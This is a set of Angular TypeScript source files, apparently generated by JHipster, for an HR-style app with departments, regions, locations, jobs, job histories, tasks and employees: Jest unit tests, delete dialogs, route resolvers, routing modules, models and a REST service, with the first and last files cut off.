  describe('DepartmentMySuffix Management Update Component', () => {
    let comp: DepartmentMySuffixUpdateComponent;
    let fixture: ComponentFixture<DepartmentMySuffixUpdateComponent>;
    let activatedRoute: ActivatedRoute;
    let departmentService: DepartmentMySuffixService;
    let locationService: LocationMySuffixService;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [DepartmentMySuffixUpdateComponent],
        providers: [FormBuilder, ActivatedRoute],
      })
        .overrideTemplate(DepartmentMySuffixUpdateComponent, '')
        .compileComponents();

      fixture = TestBed.createComponent(DepartmentMySuffixUpdateComponent);
      activatedRoute = TestBed.inject(ActivatedRoute);
      departmentService = TestBed.inject(DepartmentMySuffixService);
      locationService = TestBed.inject(LocationMySuffixService);

      comp = fixture.componentInstance;
    });

    describe('ngOnInit', () => {
      it('Should call location query and add missing value', () => {
        const department: IDepartmentMySuffix = { id: 'CBA' };
        const location: ILocationMySuffix = { id: 'algorithm magnetic' };
        department.location = location;

        const locationCollection: ILocationMySuffix[] = [{ id: 'Soft Colombia' }];
        spyOn(locationService, 'query').and.returnValue(of(new HttpResponse({ body: locationCollection })));
        const expectedCollection: ILocationMySuffix[] = [location, ...locationCollection];
        spyOn(locationService, 'addLocationMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ department });
        comp.ngOnInit();

        expect(locationService.query).toHaveBeenCalled();
        expect(locationService.addLocationMySuffixToCollectionIfMissing).toHaveBeenCalledWith(locationCollection, location);
        expect(comp.locationsCollection).toEqual(expectedCollection);
      });

      it('Should update editForm', () => {
        const department: IDepartmentMySuffix = { id: 'CBA' };
        const location: ILocationMySuffix = { id: 'installation International generating' };
        department.location = location;

        activatedRoute.data = of({ department });
        comp.ngOnInit();

        expect(comp.editForm.value).toEqual(expect.objectContaining(department));
        expect(comp.locationsCollection).toContain(location);
      });
    });

    describe('save', () => {
      it('Should call update service on save for existing entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const department = { id: 'ABC' };
        spyOn(departmentService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ department });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: department }));
        saveSubject.complete();

        // THEN
        expect(comp.previousState).toHaveBeenCalled();
        expect(departmentService.update).toHaveBeenCalledWith(department);
        expect(comp.isSaving).toEqual(false);
      });

      it('Should call create service on save for new entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const department = new DepartmentMySuffix();
        spyOn(departmentService, 'create').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ department });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: department }));
        saveSubject.complete();

        // THEN
        expect(departmentService.create).toHaveBeenCalledWith(department);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).toHaveBeenCalled();
      });

      it('Should set isSaving to false on error', () => {
        // GIVEN
        const saveSubject = new Subject();
        const department = { id: 'ABC' };
        spyOn(departmentService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ department });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.error('This is an error!');

        // THEN
        expect(departmentService.update).toHaveBeenCalledWith(department);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).not.toHaveBeenCalled();
      });
    });

    describe('Tracking relationships identifiers', () => {
      describe('trackLocationMySuffixById', () => {
        it('Should return tracked LocationMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackLocationMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });
    });
  });
});
<file_sep>import { ComponentFixture, TestBed } from '@angular/core/testing';
import { ActivatedRoute } from '@angular/router';
import { of } from 'rxjs';
import { RegionMySuffixDetailComponent } from './region-my-suffix-detail.component';
// Unit tests for RegionMySuffixDetailComponent: verifies that the entity
// resolved by the route is exposed on the component after ngOnInit.
describe('Component Tests', () => {
  describe('RegionMySuffix Management Detail Component', () => {
    let comp: RegionMySuffixDetailComponent;
    let fixture: ComponentFixture<RegionMySuffixDetailComponent>;

    beforeEach(() => {
      TestBed.configureTestingModule({
        declarations: [RegionMySuffixDetailComponent],
        providers: [
          {
            provide: ActivatedRoute,
            useValue: { data: of({ region: { id: 'ABC' } }) },
          },
        ],
      })
        .overrideTemplate(RegionMySuffixDetailComponent, '')
        .compileComponents();
      fixture = TestBed.createComponent(RegionMySuffixDetailComponent);
      comp = fixture.componentInstance;
    });

    describe('OnInit', () => {
      it('Should load region on init', () => {
        // WHEN
        comp.ngOnInit();

        // THEN
        expect(comp.region).toEqual(jasmine.objectContaining({ id: 'ABC' }));
      });
    });
  });
});
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IRegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
/**
 * Confirmation dialog shown before deleting a Region. The caller sets
 * `region` on the component instance after opening the modal via NgbModal.
 */
@Component({
  templateUrl: './region-my-suffix-delete-dialog.component.html',
})
export class RegionMySuffixDeleteDialogComponent {
  region?: IRegionMySuffix;

  constructor(protected regionService: RegionMySuffixService, public activeModal: NgbActiveModal) {}

  /** Dismisses the modal without touching the entity. */
  cancel(): void {
    this.activeModal.dismiss();
  }

  /** Deletes the region on the server, then closes the modal with the 'deleted' reason. */
  confirmDelete(id: string): void {
    this.regionService.delete(id).subscribe(() => this.activeModal.close('deleted'));
  }
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { IRegionMySuffix, RegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
/**
 * Route resolver that loads the Region addressed by the `:id` route
 * parameter before the target component is activated. Navigates to the
 * 404 page when the entity cannot be found on the server; yields a fresh,
 * empty RegionMySuffix when no id is present (the "new" route).
 */
@Injectable({ providedIn: 'root' })
export class RegionMySuffixRoutingResolveService implements Resolve<IRegionMySuffix> {
  constructor(protected service: RegionMySuffixService, protected router: Router) {}

  resolve(route: ActivatedRouteSnapshot): Observable<IRegionMySuffix> | Observable<never> {
    const id = route.params['id'];
    if (!id) {
      // "new" route: hand the form an empty entity
      return of(new RegionMySuffix());
    }
    return this.service.find(id).pipe(
      mergeMap((response: HttpResponse<RegionMySuffix>) => {
        const body = response.body;
        if (!body) {
          // entity no longer exists on the server
          this.router.navigate(['404']);
          return EMPTY;
        }
        return of(body);
      })
    );
  }
}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IJobHistoryMySuffix } from '../job-history-my-suffix.model';
import { JobHistoryMySuffixService } from '../service/job-history-my-suffix.service';
/**
 * Confirmation dialog shown before deleting a JobHistory entry. The caller
 * sets `jobHistory` on the component instance after opening the modal.
 */
@Component({
  templateUrl: './job-history-my-suffix-delete-dialog.component.html',
})
export class JobHistoryMySuffixDeleteDialogComponent {
  jobHistory?: IJobHistoryMySuffix;

  constructor(protected jobHistoryService: JobHistoryMySuffixService, public activeModal: NgbActiveModal) {}

  /** Dismisses the modal without touching the entity. */
  cancel(): void {
    this.activeModal.dismiss();
  }

  /** Deletes the job history on the server, then closes the modal with the 'deleted' reason. */
  confirmDelete(id: string): void {
    this.jobHistoryService.delete(id).subscribe(() => this.activeModal.close('deleted'));
  }
}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { ITaskMySuffix } from '../task-my-suffix.model';
import { TaskMySuffixService } from '../service/task-my-suffix.service';
import { TaskMySuffixDeleteDialogComponent } from '../delete/task-my-suffix-delete-dialog.component';
/**
 * List screen for the Task entity: loads all tasks on init and offers a
 * delete action backed by a confirmation modal.
 */
@Component({
  selector: 'jhi-task-my-suffix',
  templateUrl: './task-my-suffix.component.html',
})
export class TaskMySuffixComponent implements OnInit {
  tasks?: ITaskMySuffix[];
  isLoading = false;

  constructor(protected taskService: TaskMySuffixService, protected modalService: NgbModal) {}

  /**
   * Fetches all tasks from the backend into `tasks`. `isLoading` is true
   * while the request is in flight and reset on both success and error.
   */
  loadAll(): void {
    this.isLoading = true;

    // Partial-observer object instead of the deprecated
    // subscribe(next, error) multi-callback overload.
    this.taskService.query().subscribe({
      next: (res: HttpResponse<ITaskMySuffix[]>) => {
        this.isLoading = false;
        this.tasks = res.body ?? [];
      },
      error: () => {
        this.isLoading = false;
      },
    });
  }

  ngOnInit(): void {
    this.loadAll();
  }

  /** trackBy function for *ngFor over tasks; identifies a row by its id. */
  trackId(index: number, item: ITaskMySuffix): string {
    return item.id!;
  }

  /**
   * Opens the delete confirmation modal for the given task and reloads the
   * list when the modal closes with the 'deleted' reason.
   */
  delete(task: ITaskMySuffix): void {
    const modalRef = this.modalService.open(TaskMySuffixDeleteDialogComponent, { size: 'lg', backdrop: 'static' });
    modalRef.componentInstance.task = task;
    // unsubscribe not needed because closed completes on modal close
    modalRef.closed.subscribe(reason => {
      if (reason === 'deleted') {
        this.loadAll();
      }
    });
  }
}
<file_sep>export interface IRegionMySuffix {
id?: string;
regionName?: string | null;
}
export class RegionMySuffix implements IRegionMySuffix {
constructor(public id?: string, public regionName?: string | null) {}
}
export function getRegionMySuffixIdentifier(region: IRegionMySuffix): string | undefined {
return region.id;
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { EmployeeMySuffixComponent } from '../list/employee-my-suffix.component';
import { EmployeeMySuffixDetailComponent } from '../detail/employee-my-suffix-detail.component';
import { EmployeeMySuffixUpdateComponent } from '../update/employee-my-suffix-update.component';
import { EmployeeMySuffixRoutingResolveService } from './employee-my-suffix-routing-resolve.service';
/**
 * Routes for the Employee entity: list, detail view, create and edit.
 * Every route is guarded by UserRouteAccessService; detail/create/edit
 * resolve the target entity before activation.
 */
const employeeRoute: Routes = [
  {
    path: '',
    component: EmployeeMySuffixComponent,
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/view',
    component: EmployeeMySuffixDetailComponent,
    resolve: {
      employee: EmployeeMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: 'new',
    component: EmployeeMySuffixUpdateComponent,
    resolve: {
      employee: EmployeeMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/edit',
    component: EmployeeMySuffixUpdateComponent,
    resolve: {
      employee: EmployeeMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
];

/** Child routing module registering the Employee routes above. */
@NgModule({
  imports: [RouterModule.forChild(employeeRoute)],
  exports: [RouterModule],
})
export class EmployeeMySuffixRoutingModule {}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IDepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
/**
 * Confirmation dialog shown before deleting a Department. The caller sets
 * `department` on the component instance after opening the modal.
 */
@Component({
  templateUrl: './department-my-suffix-delete-dialog.component.html',
})
export class DepartmentMySuffixDeleteDialogComponent {
  department?: IDepartmentMySuffix;

  constructor(protected departmentService: DepartmentMySuffixService, public activeModal: NgbActiveModal) {}

  /** Dismisses the modal without touching the entity. */
  cancel(): void {
    this.activeModal.dismiss();
  }

  /** Deletes the department on the server, then closes the modal with the 'deleted' reason. */
  confirmDelete(id: string): void {
    this.departmentService.delete(id).subscribe(() => this.activeModal.close('deleted'));
  }
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { JobHistoryMySuffixComponent } from '../list/job-history-my-suffix.component';
import { JobHistoryMySuffixDetailComponent } from '../detail/job-history-my-suffix-detail.component';
import { JobHistoryMySuffixUpdateComponent } from '../update/job-history-my-suffix-update.component';
import { JobHistoryMySuffixRoutingResolveService } from './job-history-my-suffix-routing-resolve.service';
/**
 * Routes for the JobHistory entity: list, detail view, create and edit.
 * Every route is guarded by UserRouteAccessService; detail/create/edit
 * resolve the target entity before activation.
 */
const jobHistoryRoute: Routes = [
  {
    path: '',
    component: JobHistoryMySuffixComponent,
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/view',
    component: JobHistoryMySuffixDetailComponent,
    resolve: {
      jobHistory: JobHistoryMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: 'new',
    component: JobHistoryMySuffixUpdateComponent,
    resolve: {
      jobHistory: JobHistoryMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/edit',
    component: JobHistoryMySuffixUpdateComponent,
    resolve: {
      jobHistory: JobHistoryMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
];

/** Child routing module registering the JobHistory routes above. */
@NgModule({
  imports: [RouterModule.forChild(jobHistoryRoute)],
  exports: [RouterModule],
})
export class JobHistoryMySuffixRoutingModule {}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { ICountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
/**
 * Confirmation dialog shown before deleting a Country. The caller sets
 * `country` on the component instance after opening the modal.
 */
@Component({
  templateUrl: './country-my-suffix-delete-dialog.component.html',
})
export class CountryMySuffixDeleteDialogComponent {
  country?: ICountryMySuffix;

  constructor(protected countryService: CountryMySuffixService, public activeModal: NgbActiveModal) {}

  /** Dismisses the modal without touching the entity. */
  cancel(): void {
    this.activeModal.dismiss();
  }

  /** Deletes the country on the server, then closes the modal with the 'deleted' reason. */
  confirmDelete(id: string): void {
    this.countryService.delete(id).subscribe(() => this.activeModal.close('deleted'));
  }
}
<file_sep>jest.mock('@angular/router');
import { TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { ActivatedRouteSnapshot, Router } from '@angular/router';
import { of } from 'rxjs';
import { ILocationMySuffix, LocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from '../service/location-my-suffix.service';
import { LocationMySuffixRoutingResolveService } from './location-my-suffix-routing-resolve.service';
// Unit tests for LocationMySuffixRoutingResolveService: found entity,
// missing id (new entity) and not-found (404 redirect) resolution paths.
describe('Service Tests', () => {
  describe('LocationMySuffix routing resolve service', () => {
    let mockRouter: Router;
    let mockActivatedRouteSnapshot: ActivatedRouteSnapshot;
    let routingResolveService: LocationMySuffixRoutingResolveService;
    let service: LocationMySuffixService;
    let resultLocationMySuffix: ILocationMySuffix | undefined;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        providers: [Router, ActivatedRouteSnapshot],
      });
      mockRouter = TestBed.inject(Router);
      mockActivatedRouteSnapshot = TestBed.inject(ActivatedRouteSnapshot);
      routingResolveService = TestBed.inject(LocationMySuffixRoutingResolveService);
      service = TestBed.inject(LocationMySuffixService);
      resultLocationMySuffix = undefined;
    });

    describe('resolve', () => {
      it('should return ILocationMySuffix returned by find', () => {
        // GIVEN
        service.find = jest.fn(id => of(new HttpResponse({ body: { id } })));
        mockActivatedRouteSnapshot.params = { id: 'ABC' };

        // WHEN
        routingResolveService.resolve(mockActivatedRouteSnapshot).subscribe(result => {
          resultLocationMySuffix = result;
        });

        // THEN
        expect(service.find).toBeCalledWith('ABC');
        expect(resultLocationMySuffix).toEqual({ id: 'ABC' });
      });

      it('should return new ILocationMySuffix if id is not provided', () => {
        // GIVEN
        service.find = jest.fn();
        mockActivatedRouteSnapshot.params = {};

        // WHEN
        routingResolveService.resolve(mockActivatedRouteSnapshot).subscribe(result => {
          resultLocationMySuffix = result;
        });

        // THEN
        expect(service.find).not.toBeCalled();
        expect(resultLocationMySuffix).toEqual(new LocationMySuffix());
      });

      it('should route to 404 page if data not found in server', () => {
        // GIVEN
        spyOn(service, 'find').and.returnValue(of(new HttpResponse({ body: null })));
        mockActivatedRouteSnapshot.params = { id: 'ABC' };

        // WHEN
        routingResolveService.resolve(mockActivatedRouteSnapshot).subscribe(result => {
          resultLocationMySuffix = result;
        });

        // THEN
        expect(service.find).toBeCalledWith('ABC');
        expect(resultLocationMySuffix).toEqual(undefined);
        expect(mockRouter.navigate).toHaveBeenCalledWith(['404']);
      });
    });
  });
});
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { TaskMySuffixComponent } from './list/task-my-suffix.component';
import { TaskMySuffixDetailComponent } from './detail/task-my-suffix-detail.component';
import { TaskMySuffixUpdateComponent } from './update/task-my-suffix-update.component';
import { TaskMySuffixDeleteDialogComponent } from './delete/task-my-suffix-delete-dialog.component';
import { TaskMySuffixRoutingModule } from './route/task-my-suffix-routing.module';
// Feature module bundling the TaskMySuffix CRUD screens (list, detail,
// update form and delete dialog) together with their routing.
@NgModule({
  imports: [SharedModule, TaskMySuffixRoutingModule],
  declarations: [TaskMySuffixComponent, TaskMySuffixDetailComponent, TaskMySuffixUpdateComponent, TaskMySuffixDeleteDialogComponent],
  // The delete dialog is opened dynamically via NgbModal, hence entryComponents.
  entryComponents: [TaskMySuffixDeleteDialogComponent],
})
export class TaskMySuffixModule {}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { IJobMySuffix, JobMySuffix } from '../job-my-suffix.model';
import { JobMySuffixService } from './job-my-suffix.service';
// Jest unit tests for JobMySuffixService against a mocked HTTP backend
// (JHipster-generated).
describe('Service Tests', () => {
  describe('JobMySuffix Service', () => {
    let service: JobMySuffixService;
    let httpMock: HttpTestingController;
    // Baseline entity every test starts from.
    let elemDefault: IJobMySuffix;
    let expectedResult: IJobMySuffix | IJobMySuffix[] | boolean | null;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
      });
      expectedResult = null;
      service = TestBed.inject(JobMySuffixService);
      httpMock = TestBed.inject(HttpTestingController);

      elemDefault = {
        id: 'AAAAAAA',
        jobTitle: 'AAAAAAA',
        minSalary: 0,
        maxSalary: 0,
      };
    });

    describe('Service methods', () => {
      it('should find an element', () => {
        const returnedFromService = Object.assign({}, elemDefault);

        service.find('ABC').subscribe(resp => (expectedResult = resp.body));

        // Flush the mocked backend, then inspect what the service emitted.
        const req = httpMock.expectOne({ method: 'GET' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(elemDefault);
      });

      it('should create a JobMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'ID',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.create(new JobMySuffix()).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'POST' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should update a JobMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            jobTitle: 'BBBBBB',
            minSalary: 1,
            maxSalary: 1,
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.update(expected).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PUT' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should partial update a JobMySuffix', () => {
        // PATCH sends only the changed fields.
        const patchObject = Object.assign(
          {
            jobTitle: 'BBBBBB',
            minSalary: 1,
          },
          new JobMySuffix()
        );

        const returnedFromService = Object.assign(patchObject, elemDefault);

        const expected = Object.assign({}, returnedFromService);

        service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PATCH' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should return a list of JobMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            jobTitle: 'BBBBBB',
            minSalary: 1,
            maxSalary: 1,
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.query().subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush([returnedFromService]);
        httpMock.verify();
        expect(expectedResult).toContainEqual(expected);
      });

      it('should delete a JobMySuffix', () => {
        service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));

        const req = httpMock.expectOne({ method: 'DELETE' });
        req.flush({ status: 200 });
        expect(expectedResult);
      });

      describe('addJobMySuffixToCollectionIfMissing', () => {
        it('should add a JobMySuffix to an empty array', () => {
          const job: IJobMySuffix = { id: 'ABC' };
          expectedResult = service.addJobMySuffixToCollectionIfMissing([], job);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(job);
        });

        it('should not add a JobMySuffix to an array that contains it', () => {
          const job: IJobMySuffix = { id: 'ABC' };
          const jobCollection: IJobMySuffix[] = [
            {
              ...job,
            },
            { id: 'CBA' },
          ];
          expectedResult = service.addJobMySuffixToCollectionIfMissing(jobCollection, job);
          expect(expectedResult).toHaveLength(2);
        });

        it("should add a JobMySuffix to an array that doesn't contain it", () => {
          const job: IJobMySuffix = { id: 'ABC' };
          const jobCollection: IJobMySuffix[] = [{ id: 'CBA' }];
          expectedResult = service.addJobMySuffixToCollectionIfMissing(jobCollection, job);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(job);
        });

        it('should add only unique JobMySuffix to an array', () => {
          const jobArray: IJobMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Optimization calculating' }];
          const jobCollection: IJobMySuffix[] = [{ id: 'ABC' }];
          expectedResult = service.addJobMySuffixToCollectionIfMissing(jobCollection, ...jobArray);
          expect(expectedResult).toHaveLength(3);
        });

        it('should accept varargs', () => {
          const job: IJobMySuffix = { id: 'ABC' };
          const job2: IJobMySuffix = { id: 'CBA' };
          expectedResult = service.addJobMySuffixToCollectionIfMissing([], job, job2);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(job);
          expect(expectedResult).toContain(job2);
        });

        it('should accept null and undefined values', () => {
          const job: IJobMySuffix = { id: 'ABC' };
          expectedResult = service.addJobMySuffixToCollectionIfMissing([], null, job, undefined);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(job);
        });
      });
    });

    afterEach(() => {
      // Ensure no unexpected HTTP calls remain outstanding.
      httpMock.verify();
    });
  });
});
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { ILocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from '../service/location-my-suffix.service';
// Modal confirmation dialog for deleting a LocationMySuffix entity.
@Component({
  templateUrl: './location-my-suffix-delete-dialog.component.html',
})
export class LocationMySuffixDeleteDialogComponent {
  // Entity the dialog is about; assigned by the code that opens the modal.
  location?: ILocationMySuffix;

  constructor(protected locationService: LocationMySuffixService, public activeModal: NgbActiveModal) {}

  // Closes the modal without deleting anything.
  cancel(): void {
    this.activeModal.dismiss();
  }

  // Deletes the entity on the backend, then closes the modal with a
  // 'deleted' result so the opener can refresh its list.
  confirmDelete(id: string): void {
    this.locationService.delete(id).subscribe(() => {
      this.activeModal.close('deleted');
    });
  }
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { DepartmentMySuffixComponent } from './list/department-my-suffix.component';
import { DepartmentMySuffixDetailComponent } from './detail/department-my-suffix-detail.component';
import { DepartmentMySuffixUpdateComponent } from './update/department-my-suffix-update.component';
import { DepartmentMySuffixDeleteDialogComponent } from './delete/department-my-suffix-delete-dialog.component';
import { DepartmentMySuffixRoutingModule } from './route/department-my-suffix-routing.module';
// Feature module bundling the DepartmentMySuffix CRUD screens (list, detail,
// update form and delete dialog) together with their routing.
@NgModule({
  imports: [SharedModule, DepartmentMySuffixRoutingModule],
  declarations: [
    DepartmentMySuffixComponent,
    DepartmentMySuffixDetailComponent,
    DepartmentMySuffixUpdateComponent,
    DepartmentMySuffixDeleteDialogComponent,
  ],
  // The delete dialog is opened dynamically via NgbModal, hence entryComponents.
  entryComponents: [DepartmentMySuffixDeleteDialogComponent],
})
export class DepartmentMySuffixModule {}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IDepartmentMySuffix, getDepartmentMySuffixIdentifier } from '../department-my-suffix.model';
export type EntityResponseType = HttpResponse<IDepartmentMySuffix>;
export type EntityArrayResponseType = HttpResponse<IDepartmentMySuffix[]>;
/**
 * CRUD HTTP client for DepartmentMySuffix entities, backed by the
 * `api/departments` REST endpoint.
 */
@Injectable({ providedIn: 'root' })
export class DepartmentMySuffixService {
  public resourceUrl = this.applicationConfigService.getEndpointFor('api/departments');

  constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}

  /** POSTs a new department and returns the server's representation of it. */
  create(department: IDepartmentMySuffix): Observable<EntityResponseType> {
    return this.http.post<IDepartmentMySuffix>(this.resourceUrl, department, { observe: 'response' });
  }

  /** PUTs a full replacement of an existing department. */
  update(department: IDepartmentMySuffix): Observable<EntityResponseType> {
    const url = `${this.resourceUrl}/${getDepartmentMySuffixIdentifier(department) as string}`;
    return this.http.put<IDepartmentMySuffix>(url, department, {
      observe: 'response',
    });
  }

  /** PATCHes only the fields present on the given (partial) department. */
  partialUpdate(department: IDepartmentMySuffix): Observable<EntityResponseType> {
    const url = `${this.resourceUrl}/${getDepartmentMySuffixIdentifier(department) as string}`;
    return this.http.patch<IDepartmentMySuffix>(url, department, { observe: 'response' });
  }

  /** GETs a single department by its identifier. */
  find(id: string): Observable<EntityResponseType> {
    return this.http.get<IDepartmentMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /** GETs the list of departments; `req` is turned into query parameters. */
  query(req?: any): Observable<EntityArrayResponseType> {
    const params = createRequestOption(req);
    return this.http.get<IDepartmentMySuffix[]>(this.resourceUrl, { params, observe: 'response' });
  }

  /** DELETEs the department with the given identifier. */
  delete(id: string): Observable<HttpResponse<{}>> {
    return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
  }

  /**
   * Prepends to `departmentCollection` any of `departmentsToCheck` whose
   * identifier is not already present. Nullish entries and entries without an
   * identifier are skipped; the input collection is never mutated.
   */
  addDepartmentMySuffixToCollectionIfMissing(
    departmentCollection: IDepartmentMySuffix[],
    ...departmentsToCheck: (IDepartmentMySuffix | null | undefined)[]
  ): IDepartmentMySuffix[] {
    const departments: IDepartmentMySuffix[] = departmentsToCheck.filter(isPresent);
    if (departments.length === 0) {
      return departmentCollection;
    }
    const knownIdentifiers = new Set(departmentCollection.map(item => getDepartmentMySuffixIdentifier(item)!));
    const departmentsToAdd: IDepartmentMySuffix[] = [];
    for (const candidate of departments) {
      const identifier = getDepartmentMySuffixIdentifier(candidate);
      if (identifier == null || knownIdentifiers.has(identifier)) {
        continue;
      }
      knownIdentifiers.add(identifier);
      departmentsToAdd.push(candidate);
    }
    return [...departmentsToAdd, ...departmentCollection];
  }
}
<file_sep>import * as dayjs from 'dayjs';
import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { Language } from 'app/entities/enumerations/language.model';
// Shape of a JobHistory entity as exchanged with the REST API.
export interface IJobHistoryMySuffix {
  id?: string;
  startDate?: dayjs.Dayjs | null;
  endDate?: dayjs.Dayjs | null;
  language?: Language | null;
  // Related entities (many-to-one associations).
  job?: IJobMySuffix | null;
  department?: IDepartmentMySuffix | null;
  employee?: IEmployeeMySuffix | null;
}

// Concrete implementation used when constructing a blank entity client-side
// (e.g. for a "create" form).
export class JobHistoryMySuffix implements IJobHistoryMySuffix {
  constructor(
    public id?: string,
    public startDate?: dayjs.Dayjs | null,
    public endDate?: dayjs.Dayjs | null,
    public language?: Language | null,
    public job?: IJobMySuffix | null,
    public department?: IDepartmentMySuffix | null,
    public employee?: IEmployeeMySuffix | null
  ) {}
}

// Returns the primary identifier, or undefined for a not-yet-persisted entity.
export function getJobHistoryMySuffixIdentifier(jobHistory: IJobHistoryMySuffix): string | undefined {
  return jobHistory.id;
}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { IRegionMySuffix, RegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from './region-my-suffix.service';
// Jest unit tests for RegionMySuffixService against a mocked HTTP backend
// (JHipster-generated).
describe('Service Tests', () => {
  describe('RegionMySuffix Service', () => {
    let service: RegionMySuffixService;
    let httpMock: HttpTestingController;
    // Baseline entity every test starts from.
    let elemDefault: IRegionMySuffix;
    let expectedResult: IRegionMySuffix | IRegionMySuffix[] | boolean | null;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
      });
      expectedResult = null;
      service = TestBed.inject(RegionMySuffixService);
      httpMock = TestBed.inject(HttpTestingController);

      elemDefault = {
        id: 'AAAAAAA',
        regionName: 'AAAAAAA',
      };
    });

    describe('Service methods', () => {
